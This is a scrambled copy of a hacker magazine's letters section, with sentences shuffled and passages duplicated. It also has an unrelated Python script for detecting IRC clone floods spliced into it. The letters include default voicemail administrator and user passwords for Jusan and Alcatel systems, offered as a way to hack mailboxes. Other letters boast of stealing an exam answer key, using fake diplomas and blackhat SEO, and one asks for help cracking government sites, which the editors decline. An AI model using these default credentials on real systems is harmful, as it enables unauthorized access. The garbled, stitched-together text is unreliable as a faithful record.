running BBSes. In this age of the expert. I know this problem all too well. Eventually. and see if they can recommend you to customers asking about custom programming jobs. I was able to take a job in the tutoring department and included programming as subjects I could tutor. Short of a few unionized trades. skipping ahead to end-of-the-year more advanced topics that I was truly interested in. The problem was nobody in the class could finish the last question on the test as it was too difficult. Oops. I realized I didn’t work hard enough and was unable to finish because I couldn’t come up with my own equations. but the two year degree was more hands-on and offered a stronger computer hardware curriculum. doing acid. So during the test I remotely logged into the professor’s desktop computer and stole the answer key. My complete hatred of all institutional settings caught up with me and I lost interest in the material. leave them your card. but some employers strictly want that degree. Things can be difficult when you have neither. You can usually substitute experience and good references for the sheepskin. You just have to find one where you can get your foot in the door. I moved on to a software engineering job at another company. I have 20 plus years experience doing programming but my degree was originally an A. I was too busy breaking into telco boxes on the street. there’s a letter from a 27-year-old hacker who is unable to get a job due to not having the proper piece of paper declaring his skills. and Canada to bother showing up to school and I was kicked out.000 to pay back.
Random Advice
and contract-to-hire jobs to build up your work experience. In the early 90s. but had to work hard on the nontechnical stuff.) So I finished a GED and started going to a local tech school.S. Vocational schools were labeled as the places where the trouble-making students went to learn trades instead of places to become experts in their field. being a 30-year-old hacker without “formal” education. Being that a school professor is not an idiot. and decided to go the mainstream route of formal education if I was to have any hope of paying off more than the interest on this fine. I also recommend checking with any smaller computer shops in your area. After 15 years. I had a job as an electronics technician. LETTERS
Dear 2600: This letter is in response to the letter by Psion the GateKeeper in issue 25:3. I was one of three students hired by a major electronics firm that came to recruit from the school. My ability to rapidly learn on-the-fly allowed me to learn and help at the same time while making money. my solutions were displayed with an overhead projector for all the class to follow. Unfortunately. Your best bet will be to look for temporary
took vocational electronics in high school. then went on to a local university for their electronics degree. Stick with it. vocational schools and certification courses have gotten bad reputations over the years. I was left behind because of not having any credentials. I was caught for this and slapped with a fine of $40. Companies are more willing to take a chance hiring a temporary worker than a fulltime employee. In the early 90s. but had to work hard on the nontechnical stuff.) So I finished a GED and started going to a local tech school. Vocational schools were labeled as the places where the trouble-making students went to learn trades instead of places to become experts in their field. being a 30-year-old hacker without “formal” education. Being that a school professor is not an idiot. I also recommend checking with any smaller computer shops in your area. After 15 years. I had a job as an electronics technician. I was one of three students hired by a major electronics firm that came to recruit from the school. My ability to rapidly learn on-the-fly allowed me to learn and help at the same time while making money. my solutions were displayed with an overhead projector for all the class to follow. Unfortunately. Your best bet will be to look for temporary
. I concluded I was screwed. I started playing with electronics in the fourth grade. so since I was the only successful student. Get to know the owners. The group I worked for quickly learned of my computer expertise and had me building embedded computer systems and eventually the software that ran on them.LETTERS. Computers have infiltrated almost every occupation. and then let your skills be known by being in the right place at the right time to save the day. LETTERS. Exothermicus Dear 2600: In the Autumn 2008 issue. apprenticeships have become all but unheard of. When I wrote the final for my C++ course. then went on to a local university for their electronics degree. Stick with it. vocational schools and certification courses have gotten bad reputations over the years. I was left behind because of not having any credentials. I was caught for this and slapped with a fine of $40. Companies are more willing to take a chance hiring a temporary worker than a fulltime employee.

This left me working menial jobs while making adequate money on the side from blackhat SEO advertising revenue. I was still at the bottom of the IT pile. but this time with a vengeance. even if I’ll never be the ideal corporate employee that asks no questions and quietly toils away in obscurity. Miraculously. Hard work also gave me a new respect for traditional education. It’s risky job security. Although I recommend you try the formal education route to gain valuable networking connections (these contacts being the student sitting beside you in discrete mathematics that’s also interested in hacking Google T-Mobile handsets) and that ever-so-important piece of paper that basically says you can fit into corporate lifestyle.MIT’s free open courseware at ocw. I would show up and ask the other employees if I could shadow them. Sadly. If you’re fluent in a certain programming language. and aren’t just another drone looking for a paycheck. start your own minicompany or hacker space. as I ended up right back where I was after being fired due to a really stupid Facebook incident regarding pictures of me doing random drunk shenanigans with friends. so this also helped in my job search. but it still wasn’t enough and soon I was drowning in debt once again. make an offer to the department head that you’ll work for free for a week and if they like what you’re doing. This propelled me up the ladder exponentially to where I was finally in a “real” job. So I’ve excelled. but gained the position by appealing directly to the union with a desperate sales pitch delivered while I showed up to all of their events. but profit will be epic and you will be in charge of your own destiny. this time without cheating and excessive partying that doomed me the last couple of times. Good luck. as most companies want to work with contractors instead of employees.xml) since he talks to these very HR clowns that hold the destiny of your life in their hands. 
and I decided a triumphant return to University was in order. In despair. with no credentials. and disciplines I was fluent in for employers to see I was actually busy doing something after being banned from school. The next step was to become accredited through certificates such as CompTIA. approximately in his 70s. making actual money the legit way. and that I was interested in what they were doing. this sight means I’ve got an easy job of BSing someone who knows very little about the technology into buying the most expensive one and often even getting them to pay us a couple hundred dollars to plug in the three
Random Observation
draw up a simple contract and I guarantee they’ll sign it. you can always appeal directly to the company’s department head to hire you like I did with a portfolio and complete gonzo style during the interview.mit. This proves you have passion.htm. but I wasn’t satisfied with waiting forever for better pay. Some companies still appreciate these kinds of employees. and in heavy debt. ca/podcasting/xml/careerfasttrack. I didn’t even have enough credentials for this lousy blue collar job. staring at the wall of DVD players/recorders. I was working in the home theater department when I noticed an older gentleman. Then I created a portfolio of all the hack tools. most companies won’t let you touch computer hardware without being A+ certified because of warranty issues. It worked. so why shouldn’t I try it?).
my province for five years. I survived by hiring excellent employment lawyers and was back to being jobless. Or better yet. I obtained a diploma through a diploma mill and conned my way into a variety of tech companies (fake diplomas worked for the entire Bush presidential staff. A Harvard style resume (Google for it) increases your chances of being chosen from a pile of applications by 40 percent. Simply showing up and talking to somebody worked. and my complete lack of discretion and careless anarchist self-destructive philosophy soon saw me in legal trouble again. How do I manipulate this technocrat from the HR department sitting across from me in the interview who’s analyzing my every move with complicated statistical “measures” to see if I stack up to their abstract hiring formula? I found a radio show on a local University radio station put on by this guy (Philippe Desrochers) who has excellent insight if you ignore most of the corporate rhetoric (playlist. Then I found this site . The corporate world is just a game similar to the court of French kings . I needed to find out everything employers are looking for when they interview you or look at your resume. and went back to social engineering skills I learned from Kevin Mitnick’s writings and combined them with career advice given by the above radio podcast. Although this provided me with better income.edu/OcwWeb/web/ home/home/index. I needed to climb the ladder. My purpose was to collect intel on these corporations for maximum blackhat financial exploitation.everybody swirling around whoever has the power trying to win favor through any means necessary. First. The physics lectures fascinated me. I decided I needed to find a way to hack the workplace and get a real job. I turned to the fortress of solitude that is unlistenable black metal and returned to blackhat activities. Jesus Bonehead (604) Dear 2600: I work at a major retailer in Florida and came to an interesting realization the other day. 
This was not to be. and contract yourself to these employers. and I quickly worked through every online course I had time for while working a terrible blue collar job that provided adequate but legal income. research.

It just doesn’t pay the rent.some others couldn’t be exploited remotely. So if you fucks ever fuck with [email address deleted] again.4 is current. and ages. he was a hacker. Neito You can also express that love by coming to the next conference in 2010 or by continuing to support us in other ways (such as a full HOPE DVD set). Nothing in this letter should be taken as disrespect to the excellent FreeBSD project or team. I just want to mention the benefits of this alternative for the sake of choice. But plain love with no monetary transactions is good too. Many of the OpenBSD utilities are used in other BSDs (to include Darwin/OSX) and in most (if not all) major Linux distributions. then please do a little homework to explore your choices before defaulting to FreeBSD.. Compare that to your favorite operating system. I suppose. in fact. everyone interested in anything has to start somewhere) are even aware that there are open source BSD alternatives to FreeBSD. the Packet Filter (pf) firewall. thus taking the copyright out of the equation. between 1997 and 2007. then great! Stick with Linux. One good resource when choosing a flavor of open source BSD is Wikipedia’s “Comparison of BSD Operating Systems.” he said laughing. Happy Cracking! Clay Lakeland. I said to him “Happy cracking!” He turned and gave me a confused and/or intrigued look and asked what I meant. I walked up to the gentleman and asked if I could help him out. Whether you know it or not. it is the only flavor of BSD whose top goals include security. CARP. and some of those wouldn’t affect a default installation . R. Some of these utilities are included not only with Cygwin. He said he had flipped through it at Barnes and Noble a few times but never gave it much thought. OpenSSH. I guess the moral of this story. you’ve likely used utilities and technologies that are available only because there is an OpenBSD project (even if you’re in a Windows-only environment).
Have you ever used OpenSSL. At this point. He was curious about being able to record onto DVD directly from TV. You may well have helped us grasp how it can suddenly seem like a good idea.3 on May 1. I told him that. If you want to try BSD. which yields advances in other sciences such as medicine and computing. we came up with a plan using the equipment he already had to run the feed from his TV to his HD camcorder and then onto a DVD from there. we’ve certainly been told. He was happy and we both seemed pleased with ourselves about how we had outsmarted Sony’s silly copyright programming. I was more interested in helping this fellow out than selling him something as I was made aware that he wasn’t as technologically illiterate as I had assumed. He was apparently attempting to record the inauguration of Obama the previous week (I won’t hold that against him) and was informed by his Sony DVD recorder that he was unable to record due to copyright protections. only eight security advisories have been identified. was that hackers come in all shapes. or the Blowfish/Twofish encryption algorithms? Those are just a few of the goodies that have come from the OpenBSD project. my observation is that the answer is very few.” What attracted me to OpenBSD is that. FL Dear 2600: I just wanted to say. “I guess you’re right. He decided he was going across the street to pick it up on his way home.
Random Remarks
then read on! Since the release of version 4.3 on May 1. 2008 (4.5 is in release candidate status). Dear 2600: How many hackers and sysadmins interested in exploring BSD ever even consider anything but FreeBSD? Having been around various UNIX forums for quite some time. I had a break in and McAfee has now secured my site. If you’re happy with Linux. you are fucked! Jesus Montoya Well. Eventually. and what caught me off guard with this fellow. but even with Microsoft’s own Windows Services for UNIX. In fact. sizes. but anyways. Like space exploration. wires. Toby Richards You make a good case. OpenCVS. OpenBSD gives us tools that we’d otherwise not have. I doubt many novice BSD adventurers (“newbie” has become such a derogatory term when. which I admit has a much cooler mascot. It’s always been hard for us to understand what motivates people to release viruses and do other malicious and stupid things. and 4. So he was looking for a way to get around that. As he was turning to leave. OpenBSD only had two remote exploits. But we fear you may have fired the first shots of an OS Holy War in these pages that we may never live to see the end of. If you’re reading 2600 because you are interested in security. whether he knew it or not. I suggested he try reading an issue and explained the mag a bit. And it’s never too late to start. I asked if he had ever come across 2600 in his travels.. If you’re happy with your BSD. 2008 (4.5 is in release candidate status). Dear 2600: You guys are a bunch of pussy wannabe hackers that haven’t hacked anything in years.

we’re optimistic that the community will continue to support whatever projects come along as the landscape changes. Middle Island. assuming you don’t have a lot of complicated charts and diagrams (which most letter writers are able to get by without). let the world see exactly what they’re saying and use another forum to tear it to pieces. I was wondering if 2600 shares any
This illustrates one risk of blindly lashing out at websites that supposedly represent your enemies: sometimes you get it wrong and wind up hurting those you’re trying to help. payphones@2600.com and tharkinwe.com is the correct address. It’s one thing to hand over one’s banking information (which we are sending you as a courtesy). I just emailed a letter and fear it may have hit your junk box. not only in mainstream society but in the hacker world as well. DANIEL OBORI NIGERIA For some reason we get at least one letter with this exact phrasing every week and almost always from Nigeria. Still think your magazine is the greatest! The Scorpion One thing we learned while assembling the book (“The Best of 2600. which advises people submitting letters and articles to avoid weird-ass formats that may be easily readable on one machine or OS but not on another. But this takes a lot of work on our part and we need to know there’s a desire for this and. not least. Dear 2600: Hey. Dear 2600: I’d like to submit some photos of phones and an interesting story as well. But we still want to make sure that it’s available in as many places as possible since this really is an incredible tale of history we’ve been telling since 1984. Just be sure to include your subscriber info since only subscribers can advertise there. not the government. As this is how we’ve survived for a quarter of a century. stands for American Standard Code for Information Interchange) is simply text and it’s readable on any machine. but I did see this with the audio show. Rather than silence those views you find to be repellent. But the real reason why simply shutting down or attacking these sites is ultimately pointless is that it keeps the real issues from being addressed. Dear 2600: Hi. Dear 2600: I am a life member of your fine magazine.
Could you thus ship me specimen hard copies for evaluation? Thank you. Resorting to those methods yourself doesn’t convince anyone of how wrong they are and likely will even win them some support. In the end. Jason Liszkiewicz It’s mentioned at the very bottom of the section and. We have therefore sent you one copy each of all issues of both 2600 Magazine and The Hacker Quarterly in the hopes that you will evaluate them and let us know of your decision. And now the wait begins. Is letters@2600.com the right address to send them to? userguid If you’re submitting the story as an article. but to simply ask for specimen hard copies seems harmless enough. These are the propaganda sites of the most vile government on the planet and they should not be representing the people of Burma. please guide me in finding assistance in cracking these websites. yes. As for payphone photos. you can email your marketplace ads to subs@2600.com. If we spend the time and money to do this right. It makes our lives a bit easier here and. though. it can only continue if people buy the CDs/DVDs as we have no advertisers to pick up the slack. Please try and submit to the appropriate address to avoid delays and confusion. I do not see any mention in the marketplace section that I can send an ad through email instead of sending the ad to PO Box 99.
Dear 2600: I wish to contribute as well as subscribe to 2600 Magazine and The Hacker Quarterly. I was just wondering if you have ever thought about making either a CD or DVD of all your past issues for sale? I have never seen one before. If you have. Kindly. I seem to have forgotten.
Random Questions
The book has helped to bring a lot of this material into the light again. Dear 2600: I’m seeking help in cracking a fascist government website known as myanmar. a commitment to support the effort on the part of the community. count me in for a set. it’s perfectly suitable for letters and most articles. We do forgive the occasional transgression. then articles@2600.com is the place. Shutting down dissenting views is a tactic used by oppressive governments worldwide. Everyone gets one. we do want to make these issues available in an electronic medium. misterht01 First off. otherwise the address you used here (letters@2600.com) works just fine. we strongly suspect the second site is part of the opposition. There are those who would say that this is somehow part of some kind of a scam. we all benefit from this.” now available in regular or “collector’s edition” at fine and not-so-fine bookstores everywhere) is that a lot of really good material was all but forgotten. but we just don’t buy it. So yes. We find that often the best way to win a fight is to simply let the other side speak. ASCII (which. incidentally. WTF is ASCII? William Sounds like you read our auto-responder.

even if we previously have touched upon a subject. really. You saw a particular setup which didn’t give you voice permission by default. what satellite(s). you’re in the right place. I’d like to know more: how they’re used. and who is on the other (head) end. but it could possibly be a terrorist. data formats. I imagine they’re somehow involved in processing credit card payments. You asked some random person what the reasoning behind it was. But before sending it in. Dear 2600: At the moment. Dear 2600: Many gas stations here in California and elsewhere sport large parabolic satellite antennas on their roofs. This is indeed how the thought process in the world of IRC works. Jack Let’s follow what happened here. a Drobo replacement and optimizing TrueCrypt. We’d like to help everyone out. But we just can’t in good conscience reveal any bit of information about anyone having to do with any of this.net servers which basically means you have the best chance of being treated fairly there since we know and trust the people running the network. If privacy is important to you. Please get back to me when you can. #ca2600 and was informed that voice status means you are not a newb. We never have and we never will. And you’re free to publish your article wherever you want after it’s printed here. Art Smass The various networks of communication that exist under our noses that most people know nothing about are truly fascinating and we hope to see an article detailing this one in the very near future. I would appreciate it if you could unban my address. But we can’t force people to be as careful as we think they should be. There are an infinite number of chat rooms that have some sort of 2600 connection but we can’t (and don’t want to) operate them all. so I joined another channel. so don’t let that be the deciding factor. Is this what’s known as VSAT (Very Small Aperture Terminal) equipment? We Await Silent Tristero’s Empire. Someone else is also using my nickname. 
They’re clearly not for receiving TV. When you get this message. I would like to know if this topic was really never in one of your issues. job opportunities.. if not mentioned specifically. the best way to scan article titles is through the search utility at our store (store.2600.com). I’m not sure who is using my Internet ID. misunderstandings are often the norm. you were misinformed.
information about its article/letter writers to private companies or the authorities. We just ask that you not submit material to us that’s previously been printed or is already accessible on the net. Dear 2600: I’ve been a reader of 2600 for quite some time and was very disappointed when connecting to the 2600 IRC for the first time. I couldn’t find any of these keywords via the search function on the 2600 web page. and used that to pass judgment on the entire system. In this case. there’s no reason why more can’t be written on it. Thank you very much. so I would greatly appreciate a quick reply. This is very important to me. Dear 2600: I was trying to get on the EFnet IRC forum about five minutes ago and oddly it says that my address is banned. Infinityx Just because something has our name on it doesn’t mean we control it. Your idea sounds like a great potential article. Undoubtedly. I haven’t been to the 2600 forum on IRC in at least four years. As seen below. I’m writing an article about the use of virtual machines to increase file safety and security or. this doesn’t mean our contributors will exercise the same caution. and occasional direct threats to these people. Of course. One of the great pitfalls of IRC is the amazing amount of idiots who are drawn to it and who live to create mayhem and get attention for themselves.
Random Problems
believed the answer they gave you. Shouldn’t the statements/questions you make/ask depict if you are a newb or not? I could understand removing voice from people who walk into the channel asking “how do I do this” or “teach me about hacking.” But totally disregarding someone based on nothing is absurd. I asked the ops why I couldn’t get voice and didn’t receive a response. Someone else is also using my nickname. So I would greatly appreciate a quick reply. I joined #2600 only to find out that I couldn’t chat in the channel. transponders. And it pisses me off because they aren’t a supreme deity like I am. That said. either through hints contained in their writing or by revealing every detail of their personal lives through a Facebook or MySpace page that is easily found through their article/letter byline.

I chose an obvious wireless access point. You will see that in words and in online actions and you need to learn how to not let it faze you. when you have hundreds of computer-generated usernames it’s next to impossible. They just keep pouring in. of course. I purchased a new phone. I noticed right away and said something to the effect of “it feels lighter!” My buddy looked at me like I had three heads (noob!). For instance.” I thought to myself. Naturally. But that’s not the case here. the solution in this case is simply to not grant voice access to unknown entities. Laugh it up. In this particular example. Fuck them in their stupid asses. thank you for all your hard work over the years. I mean. He was also kind enough to help me save some money on my bill by making a couple of changes in the system. It didn’t even subtract the 500 messages. many stories about Sprint/Nextel screwing me over and how awful the i880 turned out to be. when my bill was posted. I learned that anytime I added and/or subtracted features of my phone plan.
FL We appreciate the kind words but we’ve never been more than 68 pages. Fast forward about an hour and a half to the plane ride. I opened the box that was sitting on my doorstep and inside were my phone and a piece of paper that informed me that all I needed to do to activate the little shit was to turn it on. and having the charges taken off (credited towards my next bill). You might have to wait until someone is around to respond to you but once you’re known as a real person. I took the opportunity to hop on my laptop and see what was up in the world. I was told that I had to have my account switched to Nextel (not “together” with Sprint as the slogan claims). I became used to receiving my bill. tray tables down. I left the store smiling on the inside knowing I would have an extra $120 in my bank account in 365 days. “OK. The bill I was supposed to pay was a little over $50. and lucky enough to have the seat next to me unoccupied. fine. While setting the ignore flag for one or two annoying people is easy. I hope 68 pages is not a trend we’ll be seeing with future 2600s. I need my 90-something pages of pure joy! 2600 is far more entertaining than even Playboy (I got married for the nakedness and tomfoolery I can have with my wife!). Different paper vendors may sometimes affect the weight slightly but we try to keep it thick enough to last. when I added 500 text messages a month to my plan. but I was shocked to feel how light it was. so just put in the paperwork. the guy behind the counter was nice about it and gave his apologies for what had happened. You jumped to the conclusion that it was some form of elitism. the system had the bright idea to add up every text (including instant messages) I’ve ever made in the history of my life together. I was under the impression that I was immune to such things and kept my service with them. I clicked the link that allowed me access to the Internet and checked my usual sources. spending 30 minutes on the phone. The changes would reduce my bill by $10 a month. they redirected me to their own page where they wanted me to view a small commercial in exchange for free Internet access. Dear 2600: On page 24 of the Winter 2002-2003 issue you guys printed your Sprint bill from the previous August. Other than dealing with annoying IRC types. I am always thankful for seeing it on the rack and actually having the money to buy 2600. something not at all uncommon in the world of IRC. Naturally. and charge me for every one. I actually made a conscious decision to spend money on the i880 made by Motorola and extended my contract with “Sprint” for another year. So why did these charges occur? Why did “Sprint”/Nextel try to charge me over $670 last month? Simple. Much to my chagrin. an error occurred in the system.
Each of these usernames then spouts random gibberish and pretty much makes the channel unusable for actual conversation between humans. Colby Yet another ringing endorsement for Sprint. It wasn’t actually called that. seat reclined. spotting the errors. I was in one of the large book retailers and picked up 25:4. All clear for electronic devices. I had a slight layover in Denver International Airport. something like DIAWireless. Naturally. and charge me for every one. I clicked the link that allowed me access to the Internet and checked my usual sources. right under that charge was my $10 a month fee for 500 text messages! I have many. it was for over $300. you should have no problem. your wonderful magazine!) and look forward to reading it over and over again every quarter. After sitting through the commercial. It’s all part of the game. Now. Three days later. For the next seven months. It is greatly appreciated! John and Lissa (the wife) Jacksonville. When I took the phone to the Sprint store to have it activated. the first message I read when it got to the main screen was “Activation Required” in a font that looked like it was designed by a fucking punk. my new phone is all I care about. Dear 2600: During the holidays while heading east to visit relatives.
but I would lose none of the features I actually used. Naturally. when I turned it on. I quote Sprint because upon payment for a phone that was not in stock. certain primates enjoy unleashing hundreds of usernames into a channel at the same time. I made changes to the account in each of those seven months. but it all boils down to this: Fuck Sprint and Nextel. Unfortunately for me. Dear 2600: I am a long time reader of your mag (OK. Several months ago.

I was at a small gathering of friends and. Borked Pseudo Mailed wrote in about the audio clip of the former Area 51 employee talking about aliens taking over the Earth and shit. I found it hilarious and very intriguing.leading to 12.at least to me that is what it sounded like. which I was locked out of. most decided to call it a night.
I proceeded to sprawl out and boot up my machine. it’s the premiere of ABC’s thrilling new reality series Homeland Security USA.msnbc. despite the grim subject matter: “National Safety Council found that driver use of cell phones contributes to six percent of vehicle crashes . Arkhayne Dear 2600: This is a half inquiry and half story time. I never got to write in for the previous issue. It had the particular frequency of clicks that sound as if keys were being pressed at a fast rate. this was part of some major screwup at Google where every page anywhere was listed as potentially harmful. It lasted for a couple of hours and was attributable to human error. I would get this every time for the next hour. My city has an automated phone system that allows you to call it. Could this have been some strange erroneous busy code? Or was it a cheeky hacker playing a New Year’s prank on my entire city? Hopefully I can get an answer. Naturally. after all of the festivities had occurred and the beer/alcohol began to turn on us. which I was locked out of. I knew that it was a recording because the typing was always the same until it stopped. Don’t
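The IRC reply above describes the practical problem with clone floods: hundreds of computer-generated nicknames join at once and spout gibberish, and setting an ignore flag on each one by hand is hopeless. What a channel operator actually does is script it. The following is an added example, not code from 2600 or from any IRC network's services: it runs over a small constructed sample of raw IRC lines (with a timestamp prepended, as a logging client would write them), flags any host from which several distinct nicks joined within a short window, and turns those hosts into wildcard ignore masks so the whole batch can be silenced at once. The "letters followed by digits" nickname heuristic and the sample host names are assumptions for the example.

```python
"""Clone-flood detection over raw IRC lines (added example, not from the page)."""
import re
from collections import defaultdict

# Constructed sample: two real users chatting, then five generated nicks
# joining from one host within two seconds and posting gibberish.
SAMPLE_LINES = [
    "1700000001 :alice!~alice@home.example.net JOIN #2600",
    "1700000002 :bob!~bob@cable.example.org JOIN #2600",
    "1700000003 :alice!~alice@home.example.net PRIVMSG #2600 :anyone tried the new pf syntax?",
    "1700000010 :xqzt8812!~x@botnet.example.com JOIN #2600",
    "1700000010 :kdfj2291!~x@botnet.example.com JOIN #2600",
    "1700000011 :pqwe7730!~x@botnet.example.com JOIN #2600",
    "1700000011 :zmnb4419!~x@botnet.example.com JOIN #2600",
    "1700000012 :rtyu0087!~x@botnet.example.com JOIN #2600",
    "1700000012 :xqzt8812!~x@botnet.example.com PRIVMSG #2600 :asdkjh qwe zxc",
    "1700000013 :kdfj2291!~x@botnet.example.com PRIVMSG #2600 :qweqwe asd",
    "1700000020 :bob!~bob@cable.example.org PRIVMSG #2600 :yes, carp works too",
]

# <timestamp> :<nick>!<user>@<host> <JOIN|PRIVMSG> <target>[ :<text>]
LINE_RE = re.compile(
    r"^(\d+) :([^!\s]+)!([^@\s]+)@(\S+) (JOIN|PRIVMSG) (\S+)(?: :(.*))?$"
)

# Heuristic only: short lowercase letter run followed by 3-5 digits, the
# shape of the throwaway nicks in the sample above.
GENERATED_NICK_RE = re.compile(r"[a-z]{3,6}\d{3,5}")


def parse_line(line):
    """Split one raw line into fields; None for lines this example does not model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, nick, user, host, cmd, target, text = m.groups()
    return {"ts": int(ts), "nick": nick, "user": user, "host": host,
            "cmd": cmd, "target": target, "text": text or ""}


def find_clone_hosts(lines, window=10, threshold=3):
    """Map host -> set of nicks, for hosts with >= threshold distinct nicks
    joining inside any sliding window of `window` seconds."""
    joins = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["cmd"] == "JOIN":
            joins[ev["host"]].append((ev["ts"], ev["nick"]))
    flagged = {}
    for host, events in joins.items():
        events.sort()
        for i, (t0, nick0) in enumerate(events):
            nicks = {nick0}
            j = i + 1
            while j < len(events) and events[j][0] - t0 <= window:
                nicks.add(events[j][1])
                j += 1
            if len(nicks) >= threshold:
                flagged.setdefault(host, set()).update(nicks)
    return flagged


def looks_generated(nick):
    """True if the nick matches the throwaway pattern; a hint, not proof."""
    return GENERATED_NICK_RE.fullmatch(nick) is not None


def ignore_masks(lines, **kw):
    """One *!*@host ignore mask per flagged host, instead of one per nick."""
    return sorted(f"*!*@{host}" for host in find_clone_hosts(lines, **kw))


def flood_messages(lines, **kw):
    """(nick, text) for every PRIVMSG sent by a nick that arrived in a flood."""
    clone_nicks = set()
    for nicks in find_clone_hosts(lines, **kw).values():
        clone_nicks |= nicks
    out = []
    for line in lines:
        ev = parse_line(line)
        if ev and ev["cmd"] == "PRIVMSG" and ev["nick"] in clone_nicks:
            out.append((ev["nick"], ev["text"]))
    return out


if __name__ == "__main__":
    for host, nicks in find_clone_hosts(SAMPLE_LINES).items():
        print(f"{host}: {len(nicks)} nicks, generated-looking: "
              f"{sum(looks_generated(n) for n in nicks)}")
    print("ignore:", ignore_masks(SAMPLE_LINES))
    for nick, text in flood_messages(SAMPLE_LINES):
        print(f"  <{nick}> {text}")
```

Keying on the host rather than the nick is the point: the nicks are disposable, the host (or netblock) usually is not, and a single `*!*@host` mask covers the whole batch. On a network where clones arrive from many hosts, the same sliding-window count can be applied per channel instead of per host; the heuristic nick check is only useful for sorting the flagged set, not for deciding on its own.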
We suspect that whoever was in charge of making or maintaining the recordings screwed up and hit the record button at the wrong time. Keep hacking. Dear 2600: In 25:4. but to my surprise I did not quite get the familiar voice of the bus check ladybot.com/ id/22418481/.600 cases of beer: Thieves on the lam after taking loaded tractor-trailers and swiping the suds.” Check it out. which this could have been. I made plans to fully investigate the entire process upon my return stop in Denver. So. I just booted into Linux and deleted it from there. I am sure there are plenty of other curious readers who would be interested as well. what it was doing. input a bus stop number.000 serious injuries and 2600 annual deaths. I just deleted all but one file. I should have analyzed the offender to see what it was.000 crashes . I know. it’s cool shit. only to realize that I had to walk home in the freezing cold. Around 1:30 am I attempted to call this service in order to check what time the bus would get to the closest stop heading in my direction. A few minutes in. but when I called the bus check number I received the sound of someone typing on a keyboard .or 636. Hence my being unable to trace the infection and find out what it really was. The real bummer is that on the way back. To remove the final file. 2600 is a great number. This took place New Year’s Day.” Yes. etc. and there were a few files and I believe two folders inside associated with the bugger. capturing the sound of their own typing and erasing whatever voice recording was already on there. I opened the folder. I just wanted to pitch in that the metal band Tool edited this recording a bunch and released it on their CD Lateralus as “Faaip de Oiad. and hear the time of the next bus and the three coming after it. I’ll be waiting. It’s quite a nifty and convenient system. Sadly. Sync Dear 2600: Had to laugh when I saw this.msn. I would be quite interested in hearing what he or she can discover about this little issue. 
They played a video that said “Tomorrow night. So explore. I knew that it was a recording because the typing was always the same until it stopped. Don’t
Random Info
if there is anyone in the Denver area or anyone who is bored at Denver International. I had at that point a limited battery life and didn’t want to mess around with it.

second sentence reads “we willll certainly see a good deal. cash. I read 2600 on a regular basis.) and the password default is the voice mailbox number itself! The admin voice mailbox uses 0# with a password default of 9999#. we’ll be sticklers about giving you back store credit for it. generating a nonsense word rather than an edited one. I got a message saying to press “star” and it would send me a text message so that I could subscribe to the service.com and it says that to sign up it is $9. and if we don’t like you. or little signs on the shelves or even
Random Feedback
cardboard displays on the counter.) and the password default is 1234#. the following should be useful: the users’ voice mailboxes use formats of 1234# (5678. This apparently resulted from somebody at the book publishers attempting to remove the contraction “we’ll” from the original article and replacing it with “we will. 20 percent for four. sell them on eBay. It just doesn’t get any more random than this. you are still getting more store credit. Just look for anything.everyone’s got to eat).” Our editorial fail-safe mechanism must have kicked in at this point. I know. just not cash. if you want to make money off your used games. at www. 102. I am a current employee of Gamestop (don’t lynch me . debit.numsvc. our jobs are rated/ ranked on how many reserves we get and a cancel hurts the store. Just an FYI. Honestly. and these invariably stack with the Edge Card if you’ve got it (the Edge Card is a $15 subscription to Game Informer magazine that gives you an extra ten percent on trade credit and an extra ten percent off used games for a year). ulysses This is actually the first time anyone has said anything. and customer..aspx. “Gaming Gamestop. We’re impressed . Trades are where Gamestop makes all its filthy lucre. I found the article interesting except for one minor detail. and I’d thought I’d let you guys know that the extra 20 percent trade credit that Unanimously Anonymous refers to in his/her/its “Gaming Gamestop” article is called Power Trade. as a side note. whatever).pdf And to hack the Alcatel VIS electronic card mailbox for installation PBX. or even ask the salesperson if they’re running any sort of trade-in promotions. It sent me a message referencing the website www. It’s stupid to take them to Gamestop. and am a manager for said retailer.gamestop. Dear 2600: This is for the information phreak! Here is information on how to hack voice mailboxes using Jusan Fonomail Proattendant: the users’ voice mailboxes use 100# (101. read it cover-tocover. 
Jeff It just doesn’t get any closer to reality than that. or bonus dollars (five dollar store credit for each game worth more than a dollar. It just doesn’t get more revealing than that..com/rl. so they’ll tell you right off the bat.” I must point out an inaccuracy. they either run extra percentages of trade credit (ten percent credit for trading in three games at once. Also. etc. Look for the nincompoops behind the register.
miss a minute of the pulse pounding excitement you’ve come to expect from Homeland Security. though: competent Gamestop employees (all three of us) know how to check to see how you paid for your game reserve (trade credit. I’m sure you have received mail about this but maybe not. etc. Dear 2600: Page 596 of The Best of 2600. I tried it to see what it’s all about by calling from my cell. No thanks! If a number is listed.99 billed to your cell phone bill monthly.” And then they show a video clip of someone waving a metal detector wand around some poor lady at the airport. and 30 percent for five). It sounds like some sort of Mountain Dew flavor. Yes. That detail is that the computer system we use will now tell how the reserve was paid for and will only allow us to pay back a cancel in the form it was paid for. Jason
Big G Dear 2600: In regards to an article in 25:4. because the company views cancels/lack of reserves as lack of interest in product so they will ship less to that store/market. but you have to trade in at least three games).com/gs/specialty/tradeins/ offers. Anyway. the customer. and now have a new favorite magazine. A lot of the time. third paragraph. Mr Velleman from France Thanks for the info.” I’m not sure if it is an original typo from the zine or from the book. You can check on the Gamestop website if there are any decent trade-in promotions running at the time. Dear 2600: I’d just like to say that I picked up the quarterly for the first time today. Anonymous Dear 2600: In a letter in 25:3 you mentioned the service 1-800-MY-ANI-IS. The sales brochure for this system can be found at www. The admin voice mailbox uses 999# with a password default of 9999#. jusan.es/eng/pdf/Fonomail%20ProAttendant. employee. a reverse lookup is free at anywho. A little caveat. and often there’s stuff on the outdoor sign about it.both in your finding it and in everyone else not finding it. Granted.es/eng/pdf/Fonomail%20ProAttendant. Usually there are big signs hanging from the ceiling that’ll tell you which titles are available with that promotion.

